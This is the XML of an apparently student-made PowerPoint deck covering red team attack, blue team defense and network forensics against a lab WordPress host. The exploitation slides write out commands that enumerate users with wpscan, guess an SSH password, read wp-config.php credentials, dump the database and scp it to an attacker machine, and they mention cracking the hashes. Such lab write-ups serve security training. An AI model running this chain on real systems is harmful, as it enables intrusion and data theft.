          <p:cNvPr id="2644" name="Google Shape;2644;p17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2645" name="Google Shape;2645;p17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175"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423417" y="34519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lang="en-US" b="1"/>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> Activity</a:t>
            </a:r>
            <a:endParaRPr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10.11.11.179 to 10.11.11.11 type DNS standard query for subscriptions.assets.time.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="4572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1"/>
              <a:t>Suspicious Activity</a:t>
            </a:r>
            <a:endParaRPr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185.243.115.84 to 172.16.4.205 type TCP repeated TCP requests demonstrating TCP handshake buffering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14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4</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2364" name="Google Shape;2364;p140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5" name="Google Shape;2365;p140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17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17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40</a:t>
            </a:fld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7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DNS Queries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2659" name="Google Shape;2659;p17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660" name="Google Shape;2660;p17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2661" name="Google Shape;2661;p17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177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Traffic that we are able to safely assume is normal would be DNS traffic making requests to the proper routers &amp; switches targeting sites approved by administrators.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They made a search query (clicked a button on a page) taking them to assets.time.com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Include screenshots of packets justifying your conclusions.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2663" name="Google Shape;2663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9297176"/>
            <a:ext cx="22643950" cy="30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17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Traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2670" name="Google Shape;2670;p17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671" name="Google Shape;2671;p17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2672" name="Google Shape;2672;p17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178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have found and established a baseline of normal HTTP traffic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 this instance, the user received a 200 OK code, indicating the site pulled up the HTML code properly and the host machine has identified this.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Include screenshots of packets justifying your conclusions.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674" name="Google Shape;2674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50" y="9455653"/>
            <a:ext cx="23750350" cy="2271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179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17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43</a:t>
            </a:fld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8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Handshake Buffer Traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2687" name="Google Shape;2687;p18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688" name="Google Shape;2688;p18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2689" name="Google Shape;2689;p18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18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We have observed malicious TCP traffic reporting back from an unauthorized IP address. This has been identified as TCP handshake buffer techniques.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threat actor was repeatedly spamming the server with ACK packets attempting to bypass the handshake procedure.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screenshots of packets justifying your conclusions.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691" name="Google Shape;2691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9261875"/>
            <a:ext cx="19848955" cy="36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18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Trojan Virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2698" name="Google Shape;2698;p18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699" name="Google Shape;2699;p18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2700" name="Google Shape;2700;p18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8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Malicious HTTP traffic infected the host machine with a trojan virus.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host machine has downloaded the infected traffic into the network by clicking on a malicious link.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screenshots of packets justifying your conclusions.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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We were able to recover june11.dll which has been identified as a trojan according to virustotal.com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02" name="Google Shape;270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87" y="7569650"/>
            <a:ext cx="23851074" cy="297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182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18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46</a:t>
            </a:fld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4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Kali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Ubuntu 18.04.4 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Ubuntu 18.04.1 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Debian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14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72" name="Google Shape;2372;p14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3" name="Google Shape;237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50" y="2902425"/>
            <a:ext cx="18507100" cy="872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80" name="Google Shape;2380;p14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Vulnerabilities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SSH/Poor password policies - High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Poor web and database configuration - High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NOPASSWD: /usr/bin/python - Critical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Google Shape;238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6" name="Google Shape;2386;p14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7</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2387" name="Google Shape;2387;p143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88" name="Google Shape;2388;p143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Open SSH/Poor Password Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394" name="Google Shape;2394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95" name="Google Shape;2395;p144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1715338"/>
            <a:ext cx="23646000" cy="112389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Enumerating the WordPress site gave the system’s user listing.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan --url 192.168.1.110/wordpress -e vp,u --plugins-detection mixed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 Running an nmap scan showed port 22 as open on the target machine.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Guessing “michael:michael” successfully logged into the server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exploit granted shell access (ssh)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96" name="Google Shape;239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50" y="6602450"/>
            <a:ext cx="12173775" cy="42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7050" y="7162225"/>
            <a:ext cx="12934875" cy="46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Google Shape;2398;p144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614788" y="8040750"/>
            <a:ext cx="1191900" cy="5055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144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614788" y="9446850"/>
            <a:ext cx="1191900" cy="5055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144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10907038" y="8786675"/>
            <a:ext cx="1191900" cy="5055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Poor Database Configuration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2406" name="Google Shape;2406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07" name="Google Shape;2407;p14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Once logged in as “michael,” it was easy to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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wp-config.php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contained the database name, username, and password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exploit allowed the attacker to do a database dump and save the information on their local machine. The attacker could then use John/Hashcat to crack the hashed passwords</a:t>
            </a:r>
            <a:endParaRPr sz="440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$ cat /var/www/html/wordpress/wp-config.php   </a:t>
            </a:r>
            <a:endParaRPr sz="440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$ mysqldump -u root -p wordpress &gt; wpdump.sql</a:t>
            </a:r>
            <a:endParaRPr sz="440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$ scp wpdump.sql haxor@192.168.1.90:~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08" name="Google Shape;240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4775" y="6453175"/>
            <a:ext cx="8348849" cy="61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2258</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>384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65" baseType="lpstr">
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Poppins Medium</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>2_Custom Design</vt:lpstr>
      <vt:lpstr>Final Engagement Attack, Defense &amp; Analysis of a Vulnerable Network By Chad Skeen</vt:lpstr>
      <vt:lpstr>Red Team Penetration Testing  </vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Exploits Used </vt:lpstr>
      <vt:lpstr>Exploitation: Open SSH/Poor Password Policy</vt:lpstr>
      <vt:lpstr>Exploitation: Poor Database Configuration</vt:lpstr>
      <vt:lpstr>Exploitation: NOPASSWD: /usr/bin/python</vt:lpstr>
      <vt:lpstr>Avoiding Detection </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Open SSH/Poor Password Policy</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Poor Database Configuration</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of NOPASSWD: /usr/bin/python</vt:lpstr>
      <vt:lpstr>Appendix </vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Blue Team Network Defense  </vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities  </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Alerts Implemented</vt:lpstr>
      <vt:lpstr>Excessive HTTP Errors Alert</vt:lpstr>
      <vt:lpstr>HTTP Request Size Monitor Alert</vt:lpstr>
      <vt:lpstr>CPU Usage Monitor Alert</vt:lpstr>
      <vt:lpstr>Hardening  </vt:lpstr>
      <vt:lpstr>Hardening Against Open SSH Ports &amp; Poor Password on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Web &amp; Database Configuration on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Against NOPASSWD on Target 1</vt:lpstr>
      <vt:lpstr>Implementing Patches  </vt:lpstr>
      <vt:lpstr>Implementing Patches with Ansible</vt:lpstr>
      <vt:lpstr>Network Forensics and Analysis    </vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities   </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Traffic Profile   </vt:lpstr>
      <vt:lpstr>Traffic Profile</vt:lpstr>
      <vt:lpstr>Behavioral Analysis</vt:lpstr>
      <vt:lpstr>Normal Activity   </vt:lpstr>
      <vt:lpstr>DNS Queries</vt:lpstr>
      <vt:lpstr>HTTP Traffic</vt:lpstr>
      <vt:lpstr>Malicious Activity   </vt:lpstr>
      <vt:lpstr>TCP Handshake Buffer Traffic</vt:lpstr>
      <vt:lpstr>Trojan Virus</vt:lpstr>
      <vt:lpstr>The End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 By Chad Skeen</dc:title>
  <cp:lastModifiedBy>Chad Skeen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T13:56:04Z</dcterms:modified>
</cp:coreProperties>
</file>